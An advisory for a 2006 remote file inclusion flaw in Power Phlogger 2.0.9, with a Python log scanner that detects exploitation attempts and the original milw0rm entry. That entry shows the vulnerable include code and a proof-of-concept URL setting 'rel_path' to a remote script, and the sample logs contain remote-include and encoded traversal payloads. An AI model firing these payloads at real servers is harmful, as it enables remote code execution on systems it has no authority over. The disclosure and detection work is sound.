Vendor: Power Phlogger
By: x_w0x
CVSS: 7.5 (HIGH)
Class: Remote|Local File Include Vulnerability
CWE: 98
Product Name: Power Phlogger
Affected Version From: 2.0.9
Affected Version To: 2.0.9
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

Power Phlogger 2.0.9

A vulnerability exists in Power Phlogger 2.0.9 which allows an attacker to include a remote file by using the 'rel_path' parameter in the config.inc.php3 script. An attacker can exploit this vulnerability to execute arbitrary code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of Power Phlogger.
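Until the upgrade is in place, web server access logs can be checked for requests that set 'rel_path' on config.inc.php3. The following is an added example, not part of the original advisory or the vendor's patch: a log scanner that flags such requests and classifies the supplied value. The log format (Common/Combined), the /pphlogger/ install path and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line of a Common/Combined Log Format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
SCRIPT = "config.inc.php3"   # script named in the advisory
PARAM = "rel_path"           # parameter named in the advisory
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)  # http://, ftp://, ...

def classify(value):
    """Classify a rel_path value, undoing up to three extra layers of URL-encoding."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    if SCHEME_RE.match(value) or value.startswith("//"):
        return "remote-include"
    if ".." in value or value.startswith("/"):
        return "local-include"
    # Assumption: no legitimate client sets rel_path, so any value is worth a look.
    return "suspicious"

def scan(lines):
    """Return (line_no, verdict, value) for every request that sets rel_path on the script."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith("/" + SCRIPT):
            continue
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == PARAM:  # PHP variable names are case-sensitive
                findings.append((n, classify(value), value))
    return findings

# Constructed sample log lines (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Oct/2006:10:00:01 +0000] "GET /pphlogger/index.php3 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [19/Oct/2006:10:02:13 +0000] "GET /pphlogger/config.inc.php3?rel_path=http://remote.example/x.txt HTTP/1.1" 200 312',
    '192.0.2.44 - - [19/Oct/2006:10:02:40 +0000] "GET /pphlogger/config.inc.php3?rel_path=%252e%252e%252fetc%252f HTTP/1.0" 200 0',
    '192.0.2.77 - - [19/Oct/2006:10:05:00 +0000] "GET /pphlogger/config.inc.php3?rel_path=inc/ HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The value is decoded repeatedly before classification, so a double-encoded URL or path is still recognized. Any hit on this script is worth reviewing, because config.inc.php3 is an include file rather than a page visitors request.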

Exploit-DB raw data:

#################################
# Power Phlogger 2.0.9 -        #
#################################
#Class:     Remote|Local File Include Vulnerability
# Remote:    Yes
# Local:     No
# Type:      High
# Site:      http://www.comscripts.com/scripts/php.power-phlogger.211.html #
# Author:    x_w0x
# Contact:   x_w0x@hotmail.com
###################################
#Vuln Code (config.inc.php3):
<?php
include $rel_path."functions.php3";//nothing here
?>

#
http://victim.com/[Power Phlogger 2.0.9]/config.inc.php3?rel_path=http://DarknesseScript.txt


#Gr££tz:makoki, azzcoder,xoron,osm@n
#Speciale gr££tz: str0ke, and elite-team

# milw0rm.com [2006-10-19]